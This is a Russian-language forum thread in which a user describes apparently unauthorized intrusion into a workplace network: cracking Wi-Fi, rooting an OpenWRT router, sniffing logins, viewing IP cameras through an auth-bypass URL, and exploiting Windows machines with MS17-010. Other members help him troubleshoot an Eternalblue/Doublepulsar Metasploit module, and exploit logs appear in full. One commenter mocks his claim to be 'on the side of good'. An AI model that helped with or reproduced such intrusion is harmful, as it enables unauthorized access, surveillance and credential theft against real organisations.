Тест рабочей сети или как извлечь максимум?

[Mc13]

Приветствую всех ИБ..тых!) Отправили меня по работе из точки А в точку Б работать. В точке Б иеется сеть класса Б и множество хостов.
Необходимо получить максимум опыта пока меня не отозвали в точку А.
ПРОБЛЕМА = Хосты за роутерами(NAT) неизвестны, Виндовс 7 негрызется, Виндовс 10 вообще невидимы в сети.

Пройденые этапы
1 - Ломаю я две ТД, подключаюсь к одной.
2 - Скинирую.
3 - Нахожу открытый маршрутизатор выполняю в метасплоит коннект на 23 порт, получаю root@OpenWRT
4 - Запускаю sniff в XEROSPLOIT, получаю два пароля с логинами(Крупные поставщики запчастей не могут себе позволить сертификат?)
5 - Далее нахожу две IP камеры производителя Hawkinson, дописываю к адресу камер /Streaming/channels/1/picture/?auth=YWRtaW46 и получаю картинку
6 - Запускаю метасплоит и ломаю 4 машины с ОКНАМИ ХР эксплоитом exploit/windows/smb/ms17_010_psexec

7 - СООБЩАЮ ВСЕ ЭТО АДМИНУ СЕТИ ИБО Я НА СТОРОНЕ ДОБРА

8 - КРИЗИС(машины за роутерами я невижу, 7е Окна мне неподдаються)

Надеюсь на полезные подсказки от сообщества, которые помогут мне развить уже достигнутый результат. Спасибо!

 

[Mc13]

Там вроде просто скачать, запихнуть в папку с MSF. У меня сразу работало =/

У меня первый раз такая ошибка, наверное не туда кинул или кинул только скрипт а надо всю папку... пытаюсь работать и ищу выход)

 

[Tayrus]

С ходу пульса незавелся, ошибка)

[*] Started bind handler
[*] 192.168.10.108:445 - Generating Eternalblue XML data
cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Skeleton.xml': No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
[*] 192.168.10.108:445 - Generating Doublepulsar XML data
cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.Skeleton.xml': No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
[*] 192.168.10.108:445 - Generating payload DLL for Doublepulsar
[-] 192.168.10.108:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.

Вы забыли папку deps указать, вот мануал по установке: Eternalblue & Doublepulsar Exploit in Metasploit Win 7 Hack

 

[Mc13]

Всем огромное спасибо, теперь мне есть что капать!)эксплоит еще незапустился вопрос времени то одно то другое, ставлю зависимости.

it looks like wine32 is missing, you should install it.
multiarch needs to be enabled first. as root, please
execute "dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32"
it looks like wine32 is missing, you should install it.
multiarch needs to be enabled first. as root, please
execute "dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32"

 

[Tayrus]

Всем огромное спасибо, теперь мне есть что капать!)эксплоит еще незапустился вопрос времени то одно то другое, ставлю зависимости.

it looks like wine32 is missing, you should install it.
multiarch needs to be enabled first. as root, please
execute "dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32"
it looks like wine32 is missing, you should install it.
multiarch needs to be enabled first. as root, please
execute "dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32"

Вам же терминал говорит выполните:
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

 

[Mc13]

Вам же терминал говорит выполните:
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

В процессу выполнения Вайн дал ошибку, потерял соединение с интернетом, некоторые пакеты неустановились. Тут все понятно и вопросов по этому поводу нет....

только хотел отправить сообщение

[*] Started bind handler
[*] 192.168.10.XX:445 - Generating Eternalblue XML data
[*] 192.168.10.XX:445 - Generating Doublepulsar XML data
[*] 192.168.10.XX:445 - Generating payload DLL for Doublepulsar
[*] 192.168.10.XX:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.10.XX:445 - Launching Eternalblue...
[+] 192.168.10.XX:445 - Pwned! Eternalblue success!
[*] 192.168.10.XX:445 - Launching Doublepulsar...
Error sending wrong architecture DLL to target
[+] 192.168.10.XX:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

 

[Mc13]

Теперь буду пробовать FuzzBunch (я правда еще даже непредставляю что это)..) под Drum`N`Bass, может поможет)))

metasploit фигово, так скажем, адаптирован под дубльпульсар. FuzzBunch нужен
...и все это под Drum`N`Bass ))

 

[xWhoAm1x]

7 - СООБЩАЮ ВСЕ ЭТО АДМИНУ СЕТИ ИБО Я НА СТОРОНЕ ДОБРА

И продолжаешь ломать)) Странное проявление добра)))

 

[Mc13]

И продолжаешь ломать)) Странное проявление добра)))

Я же любя)

 

[Tihon49]

Я же любя)

Чем всё закончилось? И закончилось ли....

 

[Vinfor]

Проверь параметри (версия ОС, розрядность,)

Error sending wrong architecture DLL to target

Также попробуй поменять PROCESSINJECT з explorer.exe на lsass.exe или spoolsv.exe lsm.exe. иногда помагает

 

[Mc13]

Чем всё закончилось? И закончилось ли....

Закончилось ли?... Я даже незнаю, закончилось, или все еще только начинается. Немного я еще продвинулся, например загрыз пару 7х окон, расширил инвентарь(по совету выше стал использовать netdiscover, мне понравилось). И с админом вроде как общаться стали, мне кажется что он меня даже немного зауважал))). А потом я уволился... Фриланс меня принял холодно, мои услуги как веб разработчика оказались не сильно востребываны. На днях в залог пришлось оставить ноутбук из за долгов. Иногда 20 000 очень большая сумма. Но если что, то я не отчаиваюсь) Нашел подработку, осваиваюсь в нетхунтуре. Неполучается победить с него беспроводные атаки. А еще пытаюсь обслуживать своих первых и пока единственных клиентов, учусь дальше, ищу деньги и заказы. И снова учиться, учиться и еще раз учиться. Мне кажется что я только сейчас понял кто такой скрипткиди... это когда ты как будто все можешь, но получается через жопу). Надеюсь еще вернусь в это прекрасное сообщество и к ИБ.